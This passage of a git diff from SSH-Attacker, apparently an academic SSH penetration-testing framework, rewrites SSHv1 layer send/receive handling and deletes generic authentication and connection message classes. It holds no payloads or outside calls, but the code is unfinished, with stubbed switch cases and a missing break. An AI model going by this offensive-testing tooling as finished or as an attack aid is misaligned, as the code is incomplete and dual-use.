java.io.ByteArrayOutputStream; import java.io.IOException; + +import de.rub.nds.sshattacker.core.protocol.ssh1.message.VersionExchangeMessageSSHV1; +import de.rub.nds.sshattacker.core.protocol.transport.message.AsciiMessage; +import de.rub.nds.sshattacker.core.protocol.transport.message.UnknownMessage; +import de.rub.nds.sshattacker.core.protocol.transport.message.VersionExchangeMessage; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -45,27 +55,89 @@ public SSH1Layer(SshContext context) { @Override public LayerProcessingResult sendConfiguration() throws IOException { - /*LayerConfiguration configuration = getLayerConfiguration(); - if (configuration != null && !configuration.getContainerList().isEmpty()) { - for (ProtocolMessage ssl2message : configuration.getContainerList()) { - ProtocolMessagePreparator preparator = ssl2message.getPreparator(context); - preparator.prepare(); - preparator.afterPrepare(); - ssl2message.getHandler(context).adjustContext(ssl2message); - ProtocolMessageSerializer serializer = ssl2message.getSerializer(context); - byte[] serializedMessage = serializer.serialize(); - ssl2message.setCompleteResultingMessage(serializedMessage); - ssl2message.getHandler(context).adjustContextAfterSerialize(ssl2message); - ssl2message.getHandler(context).updateDigest(ssl2message, true); - getLowerLayer() - .sendData( - new RecordLayerHint(ssl2message.getProtocolMessageType()), - serializedMessage); - addProducedContainer(ssl2message); + LayerConfiguration configuration = getLayerConfiguration(); + ProtocolMessageType runningProtocolMessageType = null; + ByteArrayOutputStream collectedMessageStream = new ByteArrayOutputStream(); + if (configuration != null) { + LOGGER.debug( + "[bro] Sending following configuration-size {} with layer_0 is {}", + configuration.getContainerList().size(), + configuration.getContainerList().get(0).toCompactString()); + } else { + LOGGER.debug("[bro] Configuration is null"); + } + + if (configuration != null && configuration.getContainerList() != null) { + for (ProtocolMessage message : configuration.getContainerList()) { + collectedMessageStream = new ByteArrayOutputStream(); + + LOGGER.debug("[bro] here i am with sending the message"); + + runningProtocolMessageType = message.getProtocolMessageType(); + processMessage(message, collectedMessageStream); + addProducedContainer(message); + flushCollectedMessages(runningProtocolMessageType, collectedMessageStream); + + ProtocolMessageHandler handler = message.getHandler(context); + if (handler instanceof MessageSentHandler) { + ((MessageSentHandler) handler).adjustContextAfterMessageSent(); + } } } - return getLayerResult();*/ - return null; + + if (runningProtocolMessageType == null) { + LOGGER.debug("[bro] Protocol Message Type is null!"); + } else { + LOGGER.debug("ProtocolMessageType: {}", runningProtocolMessageType.getValue()); + } + + LOGGER.debug("[bro] " + "flushing {} to lower layer", collectedMessageStream.toByteArray()); + + return getLayerResult(); + } + + private void processMessage( + ProtocolMessage message, ByteArrayOutputStream collectedMessageStream) + throws IOException { + + ProtocolMessagePreparator preparator = message.getPreparator(context); + preparator.prepare(); + + LOGGER.debug("Prepared packet"); + + ProtocolMessageSerializer serializer = message.getSerializer(context); + byte[] serializedMessage = serializer.serialize(); + message.setCompleteResultingMessage(serializedMessage); + + collectedMessageStream.writeBytes(message.getCompleteResultingMessage().getValue()); + + /* if (message.getCompleteResultingMessage().getValue()[0] + == ProtocolMessageType.SSH_MSG_NEWKEYS.getValue() + || message.getCompleteResultingMessage().getValue()[0] + == ProtocolMessageType.SSH_MSG_KEXINIT.getValue()) { + message.getHandler(context).adjustContextAfterMessageSent(message); + } else { + LOGGER.info( + "[bro] Adjusting Context while messagetype is {}", + message.getCompleteResultingMessage().getValue()[0]); + }*/ + } + + private void flushCollectedMessages( + ProtocolMessageType runningProtocolMessageType, ByteArrayOutputStream byteStream) + throws IOException { + + LOGGER.debug( + "[bro] Sending the following {} on {}", + byteStream.toByteArray(), + getLowerLayer().getLayerType()); + if (byteStream.size() > 0) { + getLowerLayer() + .sendData( + new PacketLayerHint(runningProtocolMessageType), + byteStream.toByteArray()); + byteStream.reset(); + } } @Override @@ -76,64 +148,178 @@ public LayerProcessingResult sendData(LayerProcessingHint hint, byte[] additiona @Override public LayerProcessingResult receiveData() { + LOGGER.debug("[bro] SSH-Layer ist Recieving Data now"); - /*try { - int messageLength = 0; - byte paddingLength = 0; - byte[] totalHeader; - HintedInputStream dataStream = null; - SSL2MessageType messageType; - try { - - dataStream = getLowerLayer().getDataStream(); - totalHeader = dataStream.readNBytes(SSL2ByteLength.LENGTH); - - if (SSL2TotalHeaderLengths.isNoPaddingHeader(totalHeader[0])) { - messageLength = resolveUnpaddedMessageLength(totalHeader); - paddingLength = 0x00; - } else { - messageLength = resolvePaddedMessageLength(totalHeader); - paddingLength = dataStream.readByte(); + try { + HintedInputStream dataStream; + do { + try { + LOGGER.debug("[bro] I´m here"); + dataStream = getLowerLayer().getDataStream(); + LOGGER.debug("[bro] I was here"); + } catch (IOException e) { + // the lower layer does not give us any data so we can simply return here + LOGGER.warn("The lower layer did not produce a data stream: ", e); + return getLayerResult(); } - messageType = SSL2MessageType.getMessageType(dataStream.readByte()); - } catch (IOException e) { - LOGGER.warn( - "Failed to parse SSL2 message header, parsing as unknown SSL2 message", e); - messageType = SSL2MessageType.SSL_UNKNOWN; - } - - SSL2Message message = null; - - switch (messageType) { - case SSL_CLIENT_HELLO: - message = new SSL2ClientHelloMessage(); - break; - case SSL_CLIENT_MASTER_KEY: - message = new SSL2ClientMasterKeyMessage(); - break; - case SSL_SERVER_VERIFY: - message = new SSL2ServerVerifyMessage(); - break; - case SSL_SERVER_HELLO: - message = new SSL2ServerHelloMessage(); - break; - default: - message = new UnknownSSL2Message(); - } - - message.setType((byte) messageType.getType()); - message.setMessageLength(messageLength); - message.setPaddingLength((int) paddingLength); - readDataContainer(message, context); - + LOGGER.debug("[bro] Searching for Hint"); + LayerProcessingHint tempHint = dataStream.getHint(); + if (tempHint == null) { + LOGGER.warn( + "The TLS message layer requires a processing hint. E.g. a record type. Parsing as an unknown message"); + readUnknownProtocolData(); + } else if (tempHint instanceof PacketLayerHintSSHV1) { + PacketLayerHintSSHV1 hint = (PacketLayerHintSSHV1) dataStream.getHint(); + readMessageForHint(hint); + } + // receive until the layer configuration is satisfied or no data is left + } while (shouldContinueProcessing()); } catch (TimeoutException ex) { LOGGER.debug(ex); } catch (EndOfStreamException ex) { LOGGER.debug("Reached end of stream, cannot parse more messages", ex); } - return getLayerResult();*/ - return null; + return getLayerResult(); + } + + private void readUnknownProtocolData() { + UnknownMessage message = new UnknownMessage(); + readDataContainer(message, context); + getLowerLayer().removeDrainedInputStream(); + } + + public void readMessageForHint(PacketLayerHintSSHV1 hint) { + switch (hint.getType()) { + // use correct parser for the message + case ASCII_MESSAGE: + readASCIIData(); + break; + case VERSION_EXCHANGE_MESSAGE: + readVersionExchangeProtocolData(); + case SSH_CMSG_AUTH_RHOSTS_RSA: + // Read CMSG_AUTH_RHOSTS_RSA + case SSH_MSG_DISCONNECT: + // Handle SSH_MSG_DISCONNECT message + break; + case SSH_SMSG_PUBLIC_KEY: + // Handle SSH_SMSG_PUBLIC_KEY message + break; + case SSH_CMSG_SESSION_KEY: + // Handle SSH_CMSG_SESSION_KEY message + break; + case SSH_CMSG_USER: + // Handle SSH_CMSG_USER message + break; + case SSH_CMSG_AUTH_RHOSTS: + // Handle SSH_CMSG_AUTH_RHOSTS message + break; + case SSH_CMSG_AUTH_RSA: + // Handle SSH_CMSG_AUTH_RSA message + break; + case SSH_SMSG_AUTH_RSA_CHALLENGE: + // Handle SSH_SMSG_AUTH_RSA_CHALLENGE message + break; + case SSH_CMSG_AUTH_RSA_RESPONSE: + // Handle SSH_CMSG_AUTH_RSA_RESPONSE message + break; + case SSH_CMSG_AUTH_PASSWORD: + // Handle SSH_CMSG_AUTH_PASSWORD message + break; + case SSH_CMSG_REQUEST_PTY: + // Handle SSH_CMSG_REQUEST_PTY message + break; + case SSH_CMSG_WINDOW_SIZE: + // Handle SSH_CMSG_WINDOW_SIZE message + break; + case SSH_CMSG_EXEC_SHELL: + // Handle SSH_CMSG_EXEC_SHELL message + break; + case SSH_CMSG_EXEC_CMD: + // Handle SSH_CMSG_EXEC_CMD message + break; + case SSH_SMSG_SUCCESS: + // Handle SSH_SMSG_SUCCESS message + break; + case SSH_SMSG_FAILURE: + // Handle SSH_SMSG_FAILURE message + break; + case SSH_CMSG_STDIN_DATA: + // Handle SSH_CMSG_STDIN_DATA message + break; + case SSH_SMSG_STDOUT_DATA: + // Handle SSH_SMSG_STDOUT_DATA message + break; + case SSH_SMSG_STDERR_DATA: + // Handle SSH_SMSG_STDERR_DATA message + break; + case SSH_CMSG_EOF: + // Handle SSH_CMSG_EOF message + break; + case SSH_SMSG_EXITSTATUS: + // Handle SSH_SMSG_EXITSTATUS message + break; + case SSH_MSG_CHANNEL_OPEN_CONFIRMATION: + // Handle SSH_MSG_CHANNEL_OPEN_CONFIRMATION message + break; + case SSH_MSG_CHANNEL_OPEN_FAILURE: + // Handle SSH_MSG_CHANNEL_OPEN_FAILURE message + break; + case SSH_MSG_CHANNEL_DATA: + // Handle SSH_MSG_CHANNEL_DATA message + break; + case SSH_MSG_CHANNEL_CLOSE: + // Handle SSH_MSG_CHANNEL_CLOSE message + break; + case SSH_MSG_CHANNEL_CLOSE_CONFIRMATION: + // Handle SSH_MSG_CHANNEL_CLOSE_CONFIRMATION message + break; + case SSH_SMSG_X11_OPEN: + // Handle SSH_SMSG_X11_OPEN message + break; + case SSH_CMSG_PORT_FORWARD_REQUEST: + // Handle SSH_CMSG_PORT_FORWARD_REQUEST message + break; + case SSH_MSG_PORT_OPEN: + // Handle SSH_MSG_PORT_OPEN message + break; + case SSH_CMSG_AGENT_REQUEST_FORWARDING: + // Handle SSH_CMSG_AGENT_REQUEST_FORWARDING message + break; + case SSH_SMSG_AGENT_OPEN: + // Handle SSH_SMSG_AGENT_OPEN message + break; + case SSH_MSG_IGNORE: + // Handle SSH_MSG_IGNORE message + break; + case SSH_CMSG_EXIT_CONFIRMATION: + // Handle SSH_CMSG_EXIT_CONFIRMATION message + break; + case SSH_CMSG_X11_REQUEST_FORWARDING: + // Handle SSH_CMSG_X11_REQUEST_FORWARDING message + break; + case SSH_MSG_DEBUG: + // Handle SSH_MSG_DEBUG message + break; + case SSH_CMSG_REQUEST_COMPRESSION: + // Handle SSH_CMSG_REQUEST_COMPRESSION message + break; + default: + LOGGER.error("Undefined record layer type, found type {}", hint.getType()); + throw new RuntimeException(); + // break; + } + } + + + private void readASCIIData() { + AsciiMessage message = new AsciiMessage(); + readDataContainer(message, context); + } + + private void readVersionExchangeProtocolData() { + VersionExchangeMessageSSHV1 message = new VersionExchangeMessageSSHV1(); + readDataContainer(message, context); } /*private static int resolvePaddedMessageLength(final byte[] totalHeaderLength) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java index 009cea5a3..9474b92c7 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java @@ -177,13 +177,6 @@ public LayerProcessingResult receiveData() { public void readMessageForHint(PacketLayerHint hint) { switch (hint.getType()) { // use correct parser for the message - - case AUTHENTICATION: - readAuthenticationProtocolData(); - break; - case CONNECTION: - readConnectionProtocolData(); - break; case ASCII_MESSAGE: readASCIIData(); break; @@ -780,11 +773,6 @@ private void readNewKeysProtocolData() { readDataContainer(message, context); } - private void readAuthenticationProtocolData() { - AuthenticationMessage message = new AuthenticationMessage(); - readDataContainer(message, context); - } - private void readKexInitProtocolData() { KeyExchangeInitMessage message = new KeyExchangeInitMessage(); readDataContainer(message, context); @@ -800,11 +788,6 @@ private void readVersionExchangeProtocolData() { readDataContainer(message, context); } - private void readConnectionProtocolData() { - ConnectionMessage message = new ConnectionMessage(); - readDataContainer(message, context); - } - /** * Parses the handshake layer header from the given message and parses the encapsulated message * using the correct parser. diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java index ca2b20c97..5d125b965 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java @@ -227,7 +227,9 @@ public PacketLayerHint parseMessageId(AbstractPacket packet, SshContext context) byte[] raw = packet.getPayload().getValue(); if (packet instanceof BlobPacket) { String rawText = new String(packet.getPayload().getValue(), StandardCharsets.US_ASCII); - if (rawText.startsWith("SSH-")) { + if (rawText.startsWith("SSH-2")) { + return new PacketLayerHint(ProtocolMessageType.VERSION_EXCHANGE_MESSAGE); + } else if (rawText.startsWith("SSH-1")) { return new PacketLayerHint(ProtocolMessageType.VERSION_EXCHANGE_MESSAGE); } else { final AsciiMessage message = new AsciiMessage(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/AuthenticationMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/AuthenticationMessageHandler.java deleted file mode 100644 index 7bac1e298..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/AuthenticationMessageHandler.java +++ /dev/null @@ -1,38 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.protocol.authentication.handler; - -import de.rub.nds.modifiablevariable.util.ArrayConverter; -import de.rub.nds.sshattacker.core.layer.context.SshContext; -import de.rub.nds.sshattacker.core.protocol.authentication.message.AuthenticationMessage; -import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageHandler; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -public class AuthenticationMessageHandler extends ProtocolMessageHandler { - - private static final Logger LOGGER = LogManager.getLogger(); - - public AuthenticationMessageHandler(SshContext context) { - super(context); - } - - @Override - public void adjustContext(AuthenticationMessage message) { - sshContext.setLastHandledApplicationMessageData(message.getData().getValue()); - String readableAppData = - ArrayConverter.bytesToHexString( - sshContext.getLastHandledAuthenticationMessageData()); - if (sshContext.getTalkingConnectionEndType() - == sshContext.getChooser().getMyConnectionPeer()) { - LOGGER.debug("Received Data:" + readableAppData); - } else { - LOGGER.debug("Send Data:" + readableAppData); - } - } -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/ConnectionMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/ConnectionMessageHandler.java deleted file mode 100644 index 6b574c61a..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/ConnectionMessageHandler.java +++ /dev/null @@ -1,38 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.protocol.authentication.handler; - -import de.rub.nds.modifiablevariable.util.ArrayConverter; -import de.rub.nds.sshattacker.core.layer.context.SshContext; -import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageHandler; -import de.rub.nds.sshattacker.core.protocol.connection.message.ConnectionMessage; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -public class ConnectionMessageHandler extends ProtocolMessageHandler { - - private static final Logger LOGGER = LogManager.getLogger(); - - public ConnectionMessageHandler(SshContext context) { - super(context); - } - - @Override - public void adjustContext(ConnectionMessage message) { - sshContext.setLastHandledApplicationMessageData(message.getData().getValue()); - String readableAppData = - ArrayConverter.bytesToHexString( - sshContext.getLastHandledAuthenticationMessageData()); - if (sshContext.getTalkingConnectionEndType() - == sshContext.getChooser().getMyConnectionPeer()) { - LOGGER.debug("Received Data:" + readableAppData); - } else { - LOGGER.debug("Send Data:" + readableAppData); - } - } -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/AuthenticationMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/AuthenticationMessage.java deleted file mode 100644 index b1509ceaa..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/AuthenticationMessage.java +++ /dev/null @@ -1,129 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.protocol.authentication.message; - -import de.rub.nds.modifiablevariable.ModifiableVariableProperty; -import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; -import de.rub.nds.modifiablevariable.util.ArrayConverter; -import de.rub.nds.modifiablevariable.util.UnformattedByteArrayAdapter; -import de.rub.nds.sshattacker.core.constants.ProtocolMessageType; -import de.rub.nds.sshattacker.core.layer.context.SshContext; -import de.rub.nds.sshattacker.core.protocol.authentication.handler.AuthenticationMessageHandler; -import de.rub.nds.sshattacker.core.protocol.authentication.parser.AuthenticationMessageParser; -import de.rub.nds.sshattacker.core.protocol.authentication.preparator.AuthenticationMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.authentication.serializer.AuthenticationMessageSerializer; -import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; -import jakarta.xml.bind.annotation.adapters.XmlJavaTypeAdapter; -import java.io.InputStream; -import java.util.Arrays; - -public class AuthenticationMessage extends ProtocolMessage { - @XmlJavaTypeAdapter(UnformattedByteArrayAdapter.class) - private byte[] dataConfig = null; - - @ModifiableVariableProperty private ModifiableByteArray data; - - public AuthenticationMessage(byte[] dataConfig) { - super(); - this.dataConfig = dataConfig; - this.protocolMessageType = ProtocolMessageType.AUTHENTICATION; - } - - public AuthenticationMessage() { - super(); - this.protocolMessageType = ProtocolMessageType.AUTHENTICATION; - } - - public ModifiableByteArray getData() { - return data; - } - - public void setData(ModifiableByteArray data) { - this.data = data; - } - - public void setData(byte[] data) { - if (this.data == null) { - this.data = new ModifiableByteArray(); - } - this.data.setOriginalValue(data); - } - - public byte[] getDataConfig() { - return dataConfig; - } - - public void setDataConfig(byte[] dataConfig) { - this.dataConfig = dataConfig; - } - - @Override - public String toString() { - StringBuilder sb = new StringBuilder(); - sb.append("ApplicationMessage:"); - sb.append("\n Data: "); - if (data != null && data.getValue() != null) { - sb.append(ArrayConverter.bytesToHexString(data.getValue())); - } else { - sb.append("null"); - } - return sb.toString(); - } - - @Override - public String toCompactString() { - return "APPLICATION"; - } - - @Override - public String toShortString() { - return "APP"; - } - - @Override - public AuthenticationMessageHandler getHandler(SshContext sshContext) { - return new AuthenticationMessageHandler(sshContext); - } - - @Override - public AuthenticationMessageParser getParser(SshContext sshContext, InputStream stream) { - return new AuthenticationMessageParser(stream); - } - - @Override - public AuthenticationMessagePreparator getPreparator(SshContext sshContext) { - return new AuthenticationMessagePreparator(sshContext.getChooser(), this); - } - - @Override - public AuthenticationMessageSerializer getSerializer(SshContext sshContext) { - return new AuthenticationMessageSerializer(this); - } - - @Override - public int hashCode() { - int hash = 7; - hash = 43 * hash + Arrays.hashCode(this.dataConfig); - return hash; - } - - @Override - public boolean equals(Object obj) { - if (this == obj) { - return true; - } - if (obj == null) { - return false; - } - if (getClass() != obj.getClass()) { - return false; - } - final AuthenticationMessage other = (AuthenticationMessage) obj; - return Arrays.equals(this.dataConfig, other.dataConfig); - } -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/AuthenticationMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/AuthenticationMessageParser.java deleted file mode 100644 index 3e5ff46ac..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/AuthenticationMessageParser.java +++ /dev/null @@ -1,45 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.protocol.authentication.parser; - -import de.rub.nds.sshattacker.core.protocol.authentication.message.AuthenticationMessage; -import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageParser; -import java.io.InputStream; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -public class AuthenticationMessageParser extends ProtocolMessageParser { - - private static final Logger LOGGER = LogManager.getLogger(); - - /** - * Constructor for the Parser class - * - * @param stream Inputstream to Parse the AuthentiactionMessage from - */ - public AuthenticationMessageParser(InputStream stream) { - super(stream); - } - - @Override - public void parse(AuthenticationMessage message) { - LOGGER.debug("Parsing ApplicationMessage"); - parseData(message); - message.setCompleteResultingMessage(getAlreadyParsed()); - } - - /** - * Reads the next bytes as the Data and writes them in the message - * - * @param msg Message to write in - */ - private void parseData(AuthenticationMessage msg) { - msg.setData(parseByteArrayField(getBytesLeft())); - LOGGER.debug("Data: {}", msg.getData().getValue()); - } -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/preparator/AuthenticationMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/preparator/AuthenticationMessagePreparator.java deleted file mode 100644 index fc1b53bf0..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/preparator/AuthenticationMessagePreparator.java +++ /dev/null @@ -1,41 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.protocol.authentication.preparator; - -import de.rub.nds.sshattacker.core.protocol.authentication.message.AuthenticationMessage; -import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessagePreparator; -import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -public class AuthenticationMessagePreparator - extends ProtocolMessagePreparator { - private static final Logger LOGGER = LogManager.getLogger(); - - private final AuthenticationMessage msg; - - public AuthenticationMessagePreparator(Chooser chooser, AuthenticationMessage message) { - super(chooser, message); - this.msg = message; - } - - @Override - protected void prepareProtocolMessageContents() { - LOGGER.debug("Preparing ApplicationMessage"); - prepareData(msg); - } - - private void prepareData(AuthenticationMessage msg) { - if (msg.getDataConfig() != null) { - msg.setData(msg.getDataConfig()); - } else { - msg.setData(chooser.getLastHandledAuthenticationMessageData()); - } - LOGGER.debug("Data: {}", msg.getData().getValue()); - } -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/AuthenticationMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/AuthenticationMessageSerializer.java deleted file mode 100644 index d4200f4c1..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/AuthenticationMessageSerializer.java +++ /dev/null @@ -1,41 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.protocol.authentication.serializer; - -import de.rub.nds.sshattacker.core.protocol.authentication.message.AuthenticationMessage; -import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageSerializer; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -public class AuthenticationMessageSerializer - extends ProtocolMessageSerializer { - - private static final Logger LOGGER = LogManager.getLogger(); - - /** - * Constructor for the ApplicationMessageSerializer - * - * @param message Message that should be serialized - */ - public AuthenticationMessageSerializer(AuthenticationMessage message) { - super(message); - } - - @Override - protected byte[] serializeBytes() { - LOGGER.debug("Serializing ApplicationMessage"); - writeData(); - return getAlreadySerialized(); - } - - /** Writes the data of the ApplicationMessage into the final byte[] */ - private void writeData() { - appendBytes(message.getData().getValue()); - LOGGER.debug("Data: {}", message.getData().getValue()); - } -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ConnectionMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ConnectionMessage.java deleted file mode 100644 index 063de2e75..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ConnectionMessage.java +++ /dev/null @@ -1,129 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.protocol.connection.message; - -import de.rub.nds.modifiablevariable.ModifiableVariableProperty; -import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; -import de.rub.nds.modifiablevariable.util.ArrayConverter; -import de.rub.nds.modifiablevariable.util.UnformattedByteArrayAdapter; -import de.rub.nds.sshattacker.core.constants.ProtocolMessageType; -import de.rub.nds.sshattacker.core.layer.context.SshContext; -import de.rub.nds.sshattacker.core.protocol.authentication.handler.ConnectionMessageHandler; -import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; -import de.rub.nds.sshattacker.core.protocol.connection.parser.ConnectionMessageParser; -import de.rub.nds.sshattacker.core.protocol.connection.preparator.ConnectionMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.connection.serializer.ConnectionMessageSerializer; -import jakarta.xml.bind.annotation.adapters.XmlJavaTypeAdapter; -import java.io.InputStream; -import java.util.Arrays; - -public class ConnectionMessage extends ProtocolMessage { - @XmlJavaTypeAdapter(UnformattedByteArrayAdapter.class) - private byte[] dataConfig = null; - - @ModifiableVariableProperty private ModifiableByteArray data; - - public ConnectionMessage(byte[] dataConfig) { - super(); - this.dataConfig = dataConfig; - this.protocolMessageType = ProtocolMessageType.AUTHENTICATION; - } - - public ConnectionMessage() { - super(); - this.protocolMessageType = ProtocolMessageType.AUTHENTICATION; - } - - public ModifiableByteArray getData() { - return data; - } - - public void setData(ModifiableByteArray data) { - this.data = data; - } - - public void setData(byte[] data) { - if (this.data == null) { - this.data = new ModifiableByteArray(); - } - this.data.setOriginalValue(data); - } - - public byte[] getDataConfig() { - return dataConfig; - } - - public void setDataConfig(byte[] dataConfig) { - this.dataConfig = dataConfig; - } - - @Override - public String toString() { - StringBuilder sb = new StringBuilder(); - sb.append("ApplicationMessage:"); - sb.append("\n Data: "); - if (data != null && data.getValue() != null) { - sb.append(ArrayConverter.bytesToHexString(data.getValue())); - } else { - sb.append("null"); - } - return sb.toString(); - } - - @Override - public String toCompactString() { - return "APPLICATION"; - } - - @Override - public String toShortString() { - return "APP"; - } - - @Override - public ConnectionMessageHandler getHandler(SshContext sshContext) { - return new ConnectionMessageHandler(sshContext); - } - - @Override - public ConnectionMessageParser getParser(SshContext sshContext, InputStream stream) { - return new ConnectionMessageParser(stream); - } - - @Override - public ConnectionMessagePreparator getPreparator(SshContext sshContext) { - return new ConnectionMessagePreparator(sshContext.getChooser(), this); - } - - @Override - public ConnectionMessageSerializer getSerializer(SshContext sshContext) { - return new ConnectionMessageSerializer(this); - } - - @Override - public int hashCode() { - int hash = 7; - hash = 43 * hash + Arrays.hashCode(this.dataConfig); - return hash; - } - - @Override - public boolean equals(Object obj) { - if (this == obj) { - return true; - } - if (obj == null) { - return false; - } - if (getClass() != obj.getClass()) { - return false; - } - final ConnectionMessage other = (ConnectionMessage) obj; - return Arrays.equals(this.dataConfig, other.dataConfig); - } -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ConnectionMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ConnectionMessageParser.java deleted file mode 100644 index 41ab0b38a..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ConnectionMessageParser.java +++ /dev/null @@ -1,45 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.protocol.connection.parser; - -import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageParser; -import de.rub.nds.sshattacker.core.protocol.connection.message.ConnectionMessage; -import java.io.InputStream; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -public class ConnectionMessageParser extends ProtocolMessageParser { - - private static final Logger LOGGER = LogManager.getLogger(); - - /** - * Constructor for the Parser class - * - * @param stream nputstream to Parse the ConnectionMessage from - */ - public ConnectionMessageParser(InputStream stream) { - super(stream); - } - - @Override - public void parse(ConnectionMessage message) { - LOGGER.debug("Parsing ApplicationMessage"); - parseData(message); - message.setCompleteResultingMessage(getAlreadyParsed()); - } - - /** - * Reads the next bytes as the Data and writes them in the message - * - * @param msg Message to write in - */ - private void parseData(ConnectionMessage msg) { - msg.setData(parseByteArrayField(getBytesLeft())); - LOGGER.debug("Data: {}", msg.getData().getValue()); - } -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/preparator/ConnectionMessagePreparator.java 